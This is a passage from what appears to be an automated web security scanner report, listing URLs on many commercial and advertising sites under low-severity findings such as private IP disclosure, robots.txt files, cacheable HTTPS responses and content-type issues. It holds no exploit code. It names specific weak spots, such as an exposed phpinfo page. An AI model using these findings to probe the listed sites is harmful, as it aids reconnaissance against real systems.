26.11. http://forums.silverlight.net/

26.12. http://forums.silverlight.net/default.aspx

26.13. http://forums.silverlight.net/forums/13.aspx

26.14. http://forums.silverlight.net/forums/17.aspx

26.15. http://forums.silverlight.net/forums/TopicsNotAnswered.aspx

26.16. http://hillandknowlton.com/

26.17. http://hillandknowlton.com/contacts/crisis

26.18. http://i1.iis.net/resources/third-party/omniture/omniture.combined.min.js

26.19. http://i1.windowsclient.net/omniture/s_code_dotnet.js

26.20. http://i2.msdn.microsoft.com/Areas/Sto/Content/Scripts/mm/global.js

26.21. http://i3.asp.net/umbraco-script/msc_all.js

26.22. https://inter.viewcentral.com/events/cust/search_results.aspx

26.23. http://kroogy.com/search/js/ColorPicker2.js

26.24. http://kroogy.com/search/js/prototype.lite.js

26.25. http://krypt.com/js/cart.js

26.26. https://login.live.com/login.srf

26.27. https://login.silverlight.net/resources/script/omniture/omniture.combined.min.js

26.28. https://portal.actividentity.com/

26.29. https://protect724.arcsight.com/4.0.12/resources/scripts/gen/0a193341cddbead03735a451cdf385c6.js

26.30. https://protect724.arcsight.com/index.jspa

26.31. https://psr.infusionsoft.com/js/sink_jq.jsp

26.32. https://psr.infusionsoft.com/js/sink_js.jsp

26.33. http://seal.controlcase.com/index.php

26.34. http://search.bluewin.ch/js/osn/jquery.cookie.js

26.35. https://secure.identityguard.com/webapp/wcs/stores/servlet/INTXContactUs

26.36. https://secure.krypt.com/js/cart.js

26.37. http://sensic.net/

26.38. http://smartcompanygrowth.com/bus-growth-svcs/bus-devlpmnt-svcs/business-reputation-svcs/

26.39. http://smartcompanygrowth.com/wp-content/plugins/wp-recaptcha/recaptcha.css

26.40. http://static.ch9.ms/scripts/ratings.js

26.41. http://stats.adbrite.com/stats/stats.gif

26.42. http://stats.adbrite.com/stats/stats.gif

26.43. http://stats.adbrite.com/stats/stats.gif

26.44. http://swisscomonlineshop.sso.bluewin.ch/onlineshop/PagesShared/Include/s_code.js

26.45. http://swisscomonlineshop.sso.bluewin.ch/onlineshop/Scripts/jquery.cookie.js

26.46. http://swisscomonlineshop.sso.bluewin.ch/onlineshop/Scripts/jquery.plugin.1.0.3.js

26.47. http://swisscomonlineshop.sso.bluewin.ch/onlineshop/documents/content/products/telefone/sortimentsprospekt/Leistungsmerkmale_Zusatzdienste_0810_de.pdf

26.48. http://translate.googleapis.com/translate_a/t

26.49. https://vault.krypt.com/js/jquery.sprintf.js

26.50. http://w.sharethis.com/button/buttons.js

26.51. http://www.actividentity.com/support/

26.52. http://www.arcsight.com/blog/

26.53. http://www.arcsight.com/products/products-esm/arcsight-express/

26.54. http://www.arcsight.com/products/products-identity/

26.55. http://www.arcsight.com/supportportal/

26.56. http://www.creditchecktotal.com/Message.aspx

26.57. https://www.creditchecktotal.com/Message.aspx

26.58. http://www.customscoop.com/wp-content/plugins/powerpress/player.js

26.59. http://www.discountasp.net/tfs/

26.60. http://www.echomail.com/js/oodomimagerollover.js

26.61. http://www.equifax.com/siteAssets/Learn/js/omtr_code_prod.js

26.62. https://www.experiandirect.com/triplealert/Message.aspx

26.63. http://www.fightidentitytheft.com/sites/all/modules/nice_menus/superfish/js/jquery.hoverIntent.minified.js

26.64. http://www.fightidentitytheft.com/sites/all/themes/fightid/jquery.domec.js

26.65. http://www.hotelclub.com/Common/Scripts/s_code_HC.js

26.66. http://www.identitymanagement.com/js/functions.js

26.67. http://www.infusionblog.com/

26.68. http://www.infusionsoft.com/

26.69. http://www.infusionsoft.com/about

26.70. http://www.infusionsoft.com/clients

26.71. http://www.infusionsoft.com/demo

26.72. http://www.infusionsoft.com/pricing

26.73. http://www.krypt.com/contact/

26.74. http://www.krypt.com/js/cart.js

26.75. http://www.lifelock.com/about/leadership/management/

26.76. http://www.lifelock.com/about/lifelock-in-the-community/

26.77. http://www.lifelock.com/guarantee/

26.78. http://www.lifelock.com/how-it-works/

26.79. http://www.lifelock.com/identity-theft/

26.80. http://www.lifelock.com/scripts/jquery.colorbox.min.js

26.81. http://www.lifelock.com/scripts/lifelock.js

26.82. http://www.lifelock.com/services/

26.83. http://www.lifelock.com/services/command-center/

26.84. https://www.myfico.com/Include/Register.js

26.85. http://www.myreputationmanager.com/

26.86. http://www.myreputationmanager.com/script/jsvalidations.js

26.87. http://www.nextadvisor.com/includes/javascript.php

26.88. http://www.nextadvisor.com/includes/javascript.php

26.89. http://www.nextadvisor.com/includes/javascript.php

26.90. http://www.onlinereputationmanager.com/

26.91. http://www.onlinereputationmanager.com/script/jsvalidations.js

26.92. http://www.oracle.com/webapps/dialogue/ns/form.js

26.93. http://www.oracle.com/webfolder/emktg/global/dlgreglet.js

26.94. http://www.oracle.com/webfolder/emktg/global/navtree2.js

26.95. http://www.oracleimg.com/ocom/groups/systemobject/@mktg_admin/documents/systemobject/s_code_landingpads.js

26.96. https://www.pcisecuritystandards.org/

26.97. https://www.pcisecuritystandards.org/js/jquery.cookie.js

26.98. http://www.pcworld.com/script/jqModal.js

26.99. http://www.positivesearchresults.com/

26.100. http://www.positivesearchresults.com/templates/gk_corporate/css/gk_stuff.css

26.101. http://www.positivesearchresults.com/templates/gk_corporate/css/joomla_classes.css

26.102. http://www.positivesearchresults.com/templates/gk_corporate/css/style2.css

26.103. http://www.positivesearchresults.com/templates/gk_corporate/css/suckerfish.css

26.104. http://www.positivesearchresults.com/templates/gk_corporate/css/template_css.css

26.105. http://www.positivesearchresults.com/templates/gk_corporate/css/typography.css

26.106. http://www.positivesearchresults.com/templates/gk_corporate/lib/scripts/template_scripts.js

26.107. https://www.privacyguard.com/secure/promo.aspx

26.108. http://www.senasystems.com/about/locations.html

26.109. https://www.senderscore.org/landing/ppcregistration/include/gen_validatorv31.js

26.110. http://www.silverlight.net/

26.111. http://www.silverlight.net/privacy.aspx

26.112. http://www.silverlight.net/termsofuse.aspx

26.113. http://www.swisscom.ch/FxRes/asp/sitecatalyst/s_code_bw.js

26.114. http://www.swisscom.ch/Swisscom.CorporatePortal.Web.RES/Scripts/jquery/custom/jquery.jqModal.js

26.115. http://www.swisscom.ch/Swisscom.CorporatePortal.Web.RES/Scripts/jquery/ui/jquery.bgiframe.js

26.116. http://www.swisscom.ch/Swisscom.CorporatePortal.Web.RES/Scripts/s_code_fx.js

26.117. http://www.swisscom.ch/Swisscom.CorporatePortal.Web.RES/Styles/swisscom-cicd.css

26.118. http://www.truecredit.com/shared/cncr/js/common.js

26.119. https://www.truecredit.com/shared/cncr/js/common.js

27. Private IP addresses disclosed

27.1. http://api.ak.facebook.com/restserver.php

27.2. http://api.facebook.com/restserver.php

27.3. http://connect.facebook.net/en_US/all.js

27.4. http://controlcase.com/ASV_register.php

27.5. http://static.ak.connect.facebook.com/connect.php/en_US/css/bookmark-button-css/connect-button-css/share-button-css/FB.Connect-css/connect-css

27.6. http://static.ak.connect.facebook.com/connect.php/en_US/js/Api/CanvasUtil/Connect/XFBML

27.7. http://static.ak.connect.facebook.com/images/loaders/indicator_white_large.gif

27.8. http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php/en_US

27.9. http://static.ak.fbcdn.net/rsrc.php/v1/yF/r/Y7YCBKX-HZn.swf

27.10. http://static.ak.fbcdn.net/rsrc.php/v1/z9/r/jKEcVPZFk-2.gif

27.11. https://vault.krypt.com/phpinfo.php

27.12. http://www.connect.facebook.com/widgets/fan.php

27.13. http://www.facebook.com/extern/login_status.php

27.14. http://www.facebook.com/widgets/like.php

27.15. https://www.facebook.com/plugins/like.php

27.16. http://www.fischerinternational.com/favicon.ico

27.17. http://www.fischerinternational.com/flash/home.swf

27.18. http://www.fischerinternational.com/pics/banner_logo_fischer09.jpg

27.19. http://www.fischerinternational.com/pics/bg_body2.gif

27.20. http://www.fischerinternational.com/pics/btn_view2.gif

27.21. http://www.fischerinternational.com/pics/bullet_arrow.gif

27.22. http://www.fischerinternational.com/pics/header_identity_management09-1.gif

27.23. http://www.fischerinternational.com/pics/header_identity_management09.jpg

27.24. http://www.fischerinternational.com/pics/header_news_events.gif

27.25. http://www.fischerinternational.com/pics/homepage_champion_right09.jpg

27.26. http://www.fischerinternational.com/pics/masthead_bg09.jpg

27.27. http://www.fischerinternational.com/pics/nav_company.gif

27.28. http://www.fischerinternational.com/pics/nav_contact.gif

27.29. http://www.fischerinternational.com/pics/nav_identity.gif

27.30. http://www.fischerinternational.com/pics/nav_press_rm.gif

27.31. http://www.fischerinternational.com/pics/nav_support.gif

27.32. http://www.fischerinternational.com/pics/nav_tech.gif

27.33. http://www.fischerinternational.com/pics/pixel_white.gif

27.34. http://www.fischerinternational.com/pics/tableHomeBG.jpg

27.35. http://www.google.com/sdch/rU20-FBA.dct

27.36. http://www.infusionblog.com/wp-content/uploads/2010/05/RSS.png

27.37. http://www.infusionblog.com/wp-content/uploads/2011/02/top-bg-infusionblog.jpg

27.38. http://www.infusionblog.com/wp-content/uploads/2011/04/Infusionsoft-Customer-Tour.jpg

27.39. http://www.infusionblog.com/wp-content/uploads/2011/04/Perfect-Customer-Lifecycle-thumb.jpg

27.40. http://www.infusionblog.com/wp-content/uploads/2011/04/fb-silhouette.jpg

27.41. http://www.infusionblog.com/wp-content/uploads/2011/04/playground.jpg

27.42. http://www.infusionblog.com/wp-content/uploads/2011/04/smileys.jpg

27.43. http://www.infusionblog.com/wp-content/uploads/2011/04/support-chat-online.png

27.44. http://www.swisscom.ch/Swisscom.CorporatePortal.Web.RES/Pages/ServerVariables.aspx

28. Credit card numbers disclosed

29. Robots.txt file

29.1. http://0.gravatar.com/avatar/ad516503a11cd5ca435acc9bb6523536

29.2. http://2byto.com/bluepixel/cnt-gif1x1.php

29.3. http://a.tribalfusion.com/i.cid

29.4. http://ad-emea.doubleclick.net/adi/N5295.150290.INVITEMEDIA.COM/B5186974.4

29.5. http://ad.amgdgt.com/ads/

29.6. http://ad.doubleclick.net/ad/N5047.adwords.google.com/B4529920.12

29.7. http://adfarm1.adition.com/track

29.8. http://ads.pointroll.com/PortalServe/

29.9. http://adsfac.us/ag.asp

29.10. http://affiliate.idgtracker.com/rd/r.php

29.11. http://ajax.googleapis.com/ajax/services/feed/load

29.12. http://altfarm.mediaplex.com/ad/fm/3992-125865-29115-1

29.13. http://analytic.hotelclub.com/b/ss/flairviewhcprod/1/H.17/s84063693960197

29.14. http://api.ak.facebook.com/restserver.php

29.15. http://api.facebook.com/restserver.php

29.16. http://apnxscm.ac3.msn.com:81/CACMSH.ashx

29.17. http://at.amgdgt.com/ads/

29.18. http://b.scorecardresearch.com/p

29.19. http://b.voicefive.com/b

29.20. http://b3.mookie1.com/2/ZapTrader/PizzaHut_2H/201008/18-49/All/11303658438@x90

29.21. http://beacon.afy11.net/ad

29.22. http://by.optimost.com/trial/112/p/homepage.9c7/7/content.js

29.23. http://c.betrad.com/a/n/273/79.js

29.24. http://clickserve.us2.dartsearch.net/link/click

29.25. http://clients1.google.com/complete/search

29.26. http://clk.atdmt.com/go/253732016/direct

29.27. http://cm.g.doubleclick.net/pixel

29.28. http://consumerinfo.tt.omtrdc.net/m2/consumerinfo/mbox/standard

29.29. https://crm.infusionsoft.com/aff.html

29.30. http://cspix.media6degrees.com/orbserv/hbpix

29.31. http://d.w55c.net/afr.php

29.32. http://data.coremetrics.com/cm

29.33. http://dm.de.mookie1.com/2/B3DM/RTB/11377797616@x24

29.34. http://dogtime.com/ads/dtm/tp_support.html

29.35. http://ec.atdmt.com/ds/5RTLCLFLKLFL/v132_lockman/v132_lockman_v3_LockManSSCard_160x600.swf

29.36. http://ehg-swisscom.hitbox.com/HG

29.37. http://equfx.netmng.com/

29.38. http://equifax.com/free30daytrial/

29.39. http://equifaxps.122.2o7.net/b/ss/equifaxprod,equifaxglobal/1/H.17/s0893607710022

29.40. http://es.optimost.com/es/633/c/2/u/live.js

29.41. http://evintl-aia.verisign.com/EVIntl2006.cer

29.42. http://exch.quantserve.com/pixel/p-03tSqaTFVs1ls.gif

29.43. http://feeds.bbci.co.uk/news/rss.xml

29.44. http://feeds.delicious.com/v2/json/urlinfo/data

29.45. http://fls.doubleclick.net/activityi

29.46. http://gg.google.com/csi

29.47. http://googleads.g.doubleclick.net/pagead/viewthroughconversion/1047949563/

29.48. http://gravatar.com/avatar.php

29.49. http://i.xx.openx.com/942/9420ae6abc0b141cd8a7df1a2c5156db8f33f2a8/efb/efb89dc478c1e3ed5a981c61a2475ee4.swf

29.50. http://i35.tinypic.com/vx4ox.jpg

29.51. http://img.mediaplex.com/content/0/3992/crucial_knows_notebook_160x600.html

29.52. http://img.securepaynet.net/image.aspx

29.53. http://img1.wsimg.com/rcc/portraittemplates/img_resell_model_m2.jpg

29.54. http://img3.wsimg.com/fastball/js_lib/FastballLibrary0005.js

29.55. http://leadback.netseer.com/dsatserving2/servlet/pixel

29.56. http://leads.demandbase.com/in.php

29.57. http://linkhelp.clients.google.com/tbproxy/lh/wm

29.58. https://login.live.com/login.srf

29.59. http://maps.google.com/maps/api/js

29.60. http://maps.googleapis.com/maps/api/js/StaticMapService.GetMapImage

29.61. http://maps.gstatic.com/intl/en_us/mapfiles/openhand_8_8.cur

29.62. http://media.compete.com/downblouse.de_uv_460.png

29.63. https://membership.identitymonitor.citi.com/pages2/english/neworder.asp

29.64. http://metrics.citibank.com/b/ss/prod/1/H.22.1/s0465555016417

29.65. http://microsoftsto.112.2o7.net/b/ss/msstoslvnet/1/H.19.4/s9660573691129

29.66. http://mt0.googleapis.com/vt

29.67. http://mt1.googleapis.com/vt

29.68. http://newsrss.bbc.co.uk/rss/newsonline_world_edition/front_page/rss.xml

29.69. http://now.eloqua.com/visitor/v200/svrGP.aspx

29.70. http://o.swisscom.ch/b/ss/swisscompublic/1/H.16/s08473835119511

29.71. http://omni.pcworld.com/b/ss/pcwmw-pcworld/1/H.20.3/s02955502904951

29.72. http://oracleglobal.112.2o7.net/b/ss/oracleglobal,oraclecom/1/H.19.4/s08759140628390

29.73. http://pagead2.googlesyndication.com/pagead/gen_204

29.74. http://partners.nextadnetwork.com/tracking/js.html

29.75. http://ping.hellobar.com/

29.76. http://pixel.mathtag.com/event/img

29.77. http://pixel.quantserve.com/pixel

29.78. http://polls-cdn.linkedin.com/javascripts/jquery-1.4.3.min.js

29.79. http://polls.linkedin.com/vote/131808/nzkbm

29.80. http://pubads.g.doubleclick.net/gampad/ads

29.81. http://r.turn.com/r/beacon

29.82. http://s0.2mdn.net/3095006/mpcs_040111_160x600_gm_android_1_fl.swf

29.83. http://s1.2mdn.net/2675039/4-GGL_ADWORDS_CREATIVE1_728x90_GEN_B01_v2.swf

29.84. http://safebrowsing-cache.google.com/safebrowsing/rd/ChNnb29nLW1hbHdhcmUtc2hhdmFyEAEYsv4CILb-AioFNb8AAAMyBTK_AAAH

29.85. http://safebrowsing.clients.google.com/safebrowsing/downloads

29.86. http://search.twitter.com/search.json

29.87. https://secure.identityguard.com/EnrollmentStep1

29.88. https://secure.krypt.com/cart/

29.89. http://sensic.net/wws/index.php/layer/index.php

29.90. http://smartcompanygrowth.com/bus-growth-svcs/bus-devlpmnt-svcs/business-reputation-svcs/

29.91. http://smetrics.freecreditreport.com/b/ss/expiglobal,expifcslive/1/H.22.1/s0943075860850

29.92. http://spe.atdmt.com/ds/5RTLCLFLKLFL/v120_myidmylife/v120_myidmylife_v3_job_728x90.swf

29.93. http://speed.pointroll.com/PointRoll/Media/Banners/Purina/861122/Premium_300x250_Dft.jpg

29.94. http://switch.atdmt.com/jaction/LifeLock_Landing_Page

29.95. http://testdata.coremetrics.com/eluminate

29.96. http://toolbarqueries.clients.google.com/tbproxy/af/query

29.97. http://tools.google.com/service/update2

29.98. http://tracking.keywordmax.com/tracking/show.php

29.99. http://translate.google.com/translate_a/element.js

29.100. http://transunioninteractive.122.2o7.net/b/ss/tuitruecredit/1/H.22.1/s23772791333030

29.101. https://vault.krypt.com/

29.102. http://widgets.digg.com/buttons/count

29.103. http://www.actividentity.com/device_identification_for_user_authentication

29.104. http://www.apmebf.com/r470js0-I/sz3/HGNLHPON/HPHHPMH/G/G/G

29.105. http://www.arcsight.com/products/products-identity/

29.106. http://www.bluewin.ch/includes/osn/mdd.php

29.107. http://www.connect.facebook.com/widgets/fan.php

29.108. http://www.credit.com/r/truelink_cmum_orderform/af=p39800&ag=true_monitor_order

29.109. https://www.credit.com/ufg/affRed/equifax_ws

29.110. http://www.creditreport.com/dni/default.aspx

29.111. http://www.dictof.com/

29.112. http://www.emjcd.com/5k117js0-K/sz3/HGNLHPON/HPHHPMH/G/wHKA3FJMNOOFHJGJHJKLPHNKIFGw/LrrNvrsJMuIGHHuGOHKJGGIKuOMtvHMH

29.113. http://www.equifax.com/siteUnavailableCorp.html

29.114. https://www.equifax.com/cs/SessionPingHandler

29.115. https://www.facebook.com/plugins/like.php

29.116. http://www.fightidentitytheft.com/credit-monitoring.html

29.117. http://www.flexibilitytheme.com/images/link.gif

29.118. http://www.ftjcfx.com/image-4535786-10298072

29.119. http://www.google-analytics.com/__utm.gif

29.120. http://www.google.com/coop/cse/brand

29.121. http://www.googleadservices.com/pagead/conversion/1047949563/

29.122. http://www.hostingcatalog.com/1x1s.gif

29.123. http://www.hotelclub.com/HCRefreshAshx/HttpCombiner.ashx

29.124. http://www.identityguard.com/gscc.aspx

29.125. http://www.infusionblog.com/

29.126. http://www.keywordmax.com/tracking/show.php

29.127. http://www.kqzyfj.com/click-1911961-10751987

29.128. http://www.lduhtrp.net/image-4535786-10723168

29.129. http://www.lifelock.com/about/lifelock-in-the-community/

29.130. http://www.my3bureaucreditreport.com/

29.131. http://www.nextadvisor.com/pmid/

29.132. https://www.paypal.com/cgi-bin/webscr

29.133. http://www.pcworld.com/article/149142/identity_theft_monitoring_services_called_waste.html

29.134. http://www.privacyguard.com/

29.135. https://www.privacyguard.com/secure/promo.aspx

29.136. http://www.reputationengineer.com/internet-reputation-management/

29.137. http://www.securepaynet.net/default.aspx

29.138. https://www.securepaynet.net/gdshop/basket.asp

29.139. http://www.silverlight.net/

29.140. http://www.swisscom.ch/residential

29.141. http://www.tqlkg.com/image-1911961-10775457

29.142. https://www.trustedid.com/idfide01/

30. Cacheable HTTPS response

30.1. https://cam.infusionsoft.com/cart/process

30.2. https://cam.infusionsoft.com/cart/purchase

30.3. https://cam.infusionsoft.com/login/auth

30.4. https://login.silverlight.net/login/createuser.aspx

30.5. https://membership.identitymonitor.citi.com/Signup1Enroll_vrtl.aspx

30.6. https://online.americanexpress.com/myca/ocareg/us/action

30.7. https://portal.actividentity.com/

30.8. https://portal.actividentity.com/images/favicon.ico

30.9. https://protect724.arcsight.com/themes/arcsight/images/arc_favicon.ico

30.10. https://psr.infusionsoft.com/AddForms/processFormSecure.jsp

30.11. https://psr.infusionsoft.com/files/blank.jsp

30.12. https://secure.krypt.com/cart/

30.13. https://secure.krypt.com/checkout/

30.14. https://secure.krypt.com/order/customize.html

30.15. https://vault.krypt.com/phpinfo.php

30.16. https://www.credit.com/favicon.ico

30.17. https://www.discountasp.net/favicon.ico

30.18. https://www.discountasp.net/tfs/signup/package.aspx

30.19. https://www.hotelclub.com/Common/tripleclick/tripleclick.tracker.asp

30.20. https://www.my3bureaucreditreport.com/19331/

30.21. https://www.pcisecuritystandards.org/

30.22. https://www.pcisecuritystandards.org/documents/pci_dss_v2.pdf

30.23. https://www.pcisecuritystandards.org/favicon.ico

30.24. https://www.pcisecuritystandards.org/news_events/rss.php

30.25. https://www.pcisecuritystandards.org/security_standards/documents.php

30.26. https://www.privacyguard.com/BCA/PG_NEW/Images/flash/PGPA53AF_NoPrem_CM.swf

30.27. https://www.truecredit.com/Shortcut_Icon_TU.ico

31. Multiple content types specified

32. HTML does not specify charset

32.1. http://ad.doubleclick.net/adi/N2886.151350.QUANTCAST.COM/B5403001.15

32.2. http://ad.doubleclick.net/adi/N3016.158901.DATAXU/B5398270.22

32.3. http://ad.doubleclick.net/adi/N3285.turn/B2343920.7

32.4. http://ad.doubleclick.net/adi/N3671.Google/B5102071.8

32.5. http://ad.doubleclick.net/adi/N3905.turn.com/B5269631.6

32.6. http://ad.doubleclick.net/adi/N4270.158901.DATAXU/B5279302.4

32.7. http://ad.doubleclick.net/adi/N4515.131803.TURN/B5378843.4

32.8. http://ad.doubleclick.net/adi/N4637.158901.6939390485621/B5385253.8

32.9. http://ad.doubleclick.net/adi/N4860.158901.DATAXU/B5300325.14

32.10. http://ad.doubleclick.net/adi/N5315.158901.DATAXU/B5334493.10

32.11. http://ad.doubleclick.net/adi/N553.158901.DATAXU/B4970757.13

32.12. http://ad.doubleclick.net/adi/N553.158901.DATAXU/B4970757.16

32.13. http://ad.doubleclick.net/adi/N553.158901.DATAXU/B5114832.6

32.14. http://ad.doubleclick.net/adi/N5762.158901.DATAXU/B4799014.12

32.15. http://ad.doubleclick.net/adi/N6648.150834.TURN/B5275279.6

32.16. http://ad.doubleclick.net/adi/pcw.main.news/topics/consumer_advice/article

32.17. http://ads.pointroll.com/PortalServe/

32.18. http://api.tweetmeme.com/url_info.jsonc

32.19. http://ar.voicefive.com/bmx3/iframe.htm

32.20. http://ar.voicefive.com/bmx3/projects/p81479006/invite/mtg_invite.htm

32.21. http://b3.mookie1.com/2/ZapTrader/PizzaHut_2H/201008/18-49/All/11303658438@x90

32.22. http://b3.mookie1.com/2/ZapTrader/PizzaHut_2H/201008/18-49/All/11303658455@x90

32.23. http://b3.mookie1.com/2/ZapTrader/PizzaHut_2H/201008/18-49/All/11303658466@x90

32.24. http://brandbuzz.hillandknowlton.com/display/js/functions_global.js

32.25. http://breathe.c3metrics.com/c3realview.js

32.26. http://bs.serving-sys.com/BurstingPipe/ActivityServer.bs

32.27. http://bs.serving-sys.com/BurstingPipe/adServer.bs

32.28. http://cdn.apture.com/media/html/aptureLoadIframe.html

32.29. http://cdn.w55c.net/i/0R99JaasWk_1847829791.html

32.30. http://cdn.w55c.net/i/0R9ulNflD0_1008589149.html

32.31. http://cdn.w55c.net/i/0RDMd2Pp56_1855871382.html

32.32. http://cdn.w55c.net/i/0RES95J3Zo_918427505.html

32.33. http://cdn.w55c.net/i/0REyoPRMSz_696710848.html

32.34. http://cdn.w55c.net/i/0RFFcWpaTN_954073853.html

32.35. http://cdn.w55c.net/i/0RHDjk2rJk_401783982.html

32.36. http://cdn.w55c.net/i/0RNYnkg2EM_1392081529.html

32.37. http://cdn.w55c.net/i/0ROvzxEJNe_571009919.html

32.38. http://cdn.w55c.net/i/0RW21p2fqU_270915107.html

32.39. http://cdn.w55c.net/i/0RZieDDeGI_308736425.html

32.40. http://cdn.w55c.net/i/0RaZHwYk2m_562981296.html

32.41. http://cdn.w55c.net/i/0RilLTaqf1_958911823.html

32.42. http://cdn.w55c.net/i/0RkPQrQRFy_1341446950.html

32.43. http://cdn.w55c.net/i/0Rl7Vm3VTU_682412618.html

32.44. http://cdn.w55c.net/i/0RphY9og2j_721933665.html

32.45. http://cdn.w55c.net/i/0RuFuATqDZ_452086828.html

32.46. http://d7.zedo.com/bar/v16-405/d3/jsc/fm.js

32.47. http://de.swisscom.ch/

32.48. http://dm.de.mookie1.com/2/B3DM/RTB/11325065670@x24

32.49. http://dm.de.mookie1.com/2/B3DM/RTB/11377797616@x24

32.50. http://dm.de.mookie1.com/2/B3DM/RTB/12132898267@x24

32.51. http://dogtime.com/ads/dtm/tp_support.html

32.52. http://equifax.com/free30daytrial/

32.53. http://fls.doubleclick.net/activityi

32.54. http://kroogy.com/N

32.55. http://kroogy.com/a

32.56. http://kroogy.com/favicon.ico

32.57. http://kroogy.com/index.php

32.58. http://kroogy.com/index/N

32.59. http://kroogy.com/index/index.php

32.60. http://kroogy.com/index/livesearch&q=s&type=web

32.61. http://kroogy.com/index/livesearch&q=si&type=web

32.62. http://kroogy.com/index/livesearch&q=sit&type=web

32.63. http://kroogy.com/index/livesearch&q=site&type=web

32.64. http://kroogy.com/index/livesearch&q=site:&type=web

32.65. http://kroogy.com/pub/banner_728_90_random.php

32.66. http://kroogy.com/search/images/blank.gif

32.67. http://kroogy.com/search/random.php

32.68. http://kroogy.com/search/web/index.php

32.69. http://krypt.com/

32.70. http://krypt.com/active/cart/add.html

32.71. http://krypt.com/dedicated/

32.72. http://krypt.com/go/promos

32.73. http://now.eloqua.com/visitor/v200/svrGP.aspx

32.74. http://partners.nextadnetwork.com/z/371/CD1/id4+106163471

32.75. http://pub.retailer-amazon.net/a

32.76. http://pub.retailer-amazon.net/banner_120_600_a.php

32.77. http://pub.retailer-amazon.net/banner_120_600_b.php

32.78. http://pub.retailer-amazon.net/banner_728_90_a.php

32.79. http://pub.retailer-amazon.net/banner_728_90_b.php

32.80. http://pub.retailer-amazon.net/favicon.ico

32.81. https://secure.krypt.com/cart/

32.82. https://secure.krypt.com/checkout/

32.83. https://secure.krypt.com/order/customize.html

32.84. http://swisscomonlineshop.sso.bluewin.ch/onlineshop/images/watermark.gif

32.85. http://switch.atdmt.com/jaction/LifeLock_Landing_Page

32.86. http://www.bluewin.ch/includes/osn/mdd.php

32.87. http://www.discountasp.net/favicon.ico

32.88. https://www.discountasp.net/favicon.ico

32.89. http://www.echomail.com/pricing/pricing_sm.asp

32.90. http://www.gfk.com/ssi/share/index.de.html.ssi

32.91. http://www.gfk.com/ssi/share/index.en.html.ssi

32.92. http://www.hotelclub.com/blank.htm

32.93. http://www.hotelclub.com/common/adRevresda.asp

32.94. http://www.identityguard.com/dashboard_demo.html

32.95. http://www.identityguard.com/ipages/le4/styles/ie.css

32.96. http://www.kroogy.com/favicon.ico

32.97. http://www.krypt.com/contact/

32.98. http://www.krypt.com/solutions/

32.99. http://www.krypt.com/why-us/

32.100. http://www.krypt.com/why-us/datacenters/lax/

32.101. http://www.krypt.com/why-us/network/

32.102. http://www.nextadvisor.com/includes/javascript.php

32.103. http://www.nextadvisor.com/link.php

32.104. http://www.reputationengineer.com/wp-content/plugins/cforms/lib_ajax.php

32.105. http://www.reputationengineer.com/wp-content/themes/flexibility2/

32.106. http://www.upsellit.com/custom/trustedID.jsp

32.107. http://www.upsellit.com/upsellitJS4.jsp

33. Content type incorrectly stated

33.1. http://a.rad.msn.com/ADSAdClient31.dll

33.2. http://a0.twimg.com/profile_images/527575506/faabo_01_normal.gif

33.3. http://a3.twimg.com/profile_images/372426117/cc_logo_facebook_normal.gif

33.4. http://ads.pointroll.com/PortalServe/

33.5. http://api.tweetmeme.com/url_info.jsonc

33.6. http://ar.voicefive.com/b/rc.pli

33.7. https://arcsight.secure.force.com/resource/1277579372000/images/backcontent_foot.png

33.8. https://arcsight.secure.force.com/resource/1277579372000/images/backcontent_midd.png

33.9. http://audience.sysomos.com/track/t

33.10. http://b2p.imgsrc.ru/b/blubberattack/1/16692341HbK.jpg

33.11. http://b2p.imgsrc.ru/b/blubberattack/8/13414178bpL.jpg

33.12. http://breathe.c3metrics.com/c3realview.js

33.13. http://bs.serving-sys.com/BurstingPipe/ActivityServer.bs

33.14. http://bs.serving-sys.com/BurstingPipe/adServer.bs

33.15. http://cdn.apture.com/media/searchfilter.khtml.js

33.16. http://cdn.gigya.com/js/gigya.services.socialize.plugins.login.min.js

33.17. http://cdn.gigya.com/js/gigya.services.socialize.plugins.simpleshare.min.js

33.18. http://chat.echomail.com/livezilla/server.php

33.19. http://chat.india.interactive.com/livezilla/server.php

33.20. http://chat.livechatinc.net/licence/1028624/script.cgi

33.21. http://consumerinfo.tt.omtrdc.net/m2/consumerinfo/mbox/standard

33.22. http://controlcase.com/process_contact.php

33.23. http://controlcase.com/process_form_DL.php

33.24. http://controlcase.com/process_form_PW.php

33.25. http://echomail.com/js/scroller_lg.js

33.26. http://echomail.com/js/scroller_sm.js

33.27. http://equfx.netmng.com/

33.28. http://equifax.com/free30daytrial/css/slatestd-bold-webfont.woff

33.29. http://equifax.com/free30daytrial/css/slatestd-boldcondensed-webfont.woff

33.30. http://equifax.com/free30daytrial/css/slatestd-condensed-webfont.woff

33.31. http://equifax.com/free30daytrial/css/slatestd-webfont.woff

33.32. http://event.adxpose.com/event.flow

33.33. http://evintl-aia.verisign.com/EVIntl2006.cer

33.34. http://feeds.delicious.com/v2/json/urlinfo/data

33.35. http://fightidentitytheft.hubspot.com/salog.js.aspx

33.36. http://i1.iis.net/resources/images/bloggers/shanselman.jpg

33.37. http://i2.silverlight.net/avatar/anonymous.jpg

33.38. http://i3.silverlight.net/avatar/anonymous.jpg

33.39. http://img1.wsimg.com/rcc/portraittemplates/img_resell_model_m2.jpg

33.40. http://insight.adsrvr.org/track/conv

33.41. https://inter.viewcentral.com/events/uploads/arcsight/cbt.jpg

33.42. https://inter.viewcentral.com/events/uploads/arcsight/ilt.jpg

33.43. https://inter.viewcentral.com/events/uploads/arcsight/vlt.jpg

33.44. http://javadl-esd.sun.com/update/AU/map-2.0.3.1.xml

33.45. http://krypt.com/active/cart/add.html

33.46. http://l.apture.com/v3/

33.47. http://maps.googleapis.com/maps/api/js/AuthenticationService.Authenticate

33.48. http://maps.googleapis.com/maps/api/js/ViewportInfoService.GetViewportInfo

33.49. http://maps.gstatic.com/intl/en_us/mapfiles/closedhand_8_8.cur

33.50. http://maps.gstatic.com/intl/en_us/mapfiles/openhand_8_8.cur

33.51. http://now.eloqua.com/visitor/v200/svrGP.aspx

33.52. https://portal.actividentity.com/images/favicon.ico

33.53. http://positivesearches1.app6.hubspot.com/salog.js.aspx

33.54. http://rad.msn.com/ADSAdClient31.dll

33.55. http://sales.liveperson.net/hcp/html/mTag.js

33.56. http://seal.controlcase.com/include/image/cc-logo.gif

33.57. http://switch.atdmt.com/jaction/LifeLock_Landing_Page

33.58. http://track3.mybloglog.com/js/jsserv.php

33.59. http://track3.mybloglog.com/tr/urltrk.php

33.60. http://translate.googleapis.com/translate_a/t

33.61. http://windowsclient.net/omniture/analyticsid.aspx

